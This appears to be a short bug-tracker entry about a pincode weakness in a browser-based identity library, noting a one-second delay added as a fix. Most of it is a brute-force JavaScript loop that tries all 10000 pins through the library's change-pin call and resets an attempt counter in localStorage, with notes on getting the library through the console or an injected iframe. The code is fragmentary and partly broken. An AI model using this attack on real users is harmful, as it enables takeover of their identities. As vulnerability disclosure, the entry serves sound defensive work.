Increase the time which is required to break the pincode
1 second delay was added after failed attempt of entering pin code
Break any pincode to default 0000 in 2-5 minutes by using brute force
We need to get VCL library and set it into the lib
variable. Either get lib from debugger in browser console (we have access to user's computer) or inject one more VCL library and work with it (injected iframe script)
In that case we have access to user laptop. Either we can change pincode remotely by using iframe from 11 issue
lib = await window.setupViamAPI(
onEvent: () => {}
r = await lib.listIdentities()
key = Object.keys([0]
for (let i = 0; i < 10000; i++)
var oldNum = ""+i;
await lib.changeIdentityPinCode(key, ('0000' + oldNum).substring(oldNum.length), '0000');
localStorage.attempt = 1
Edited by Alexey Lunin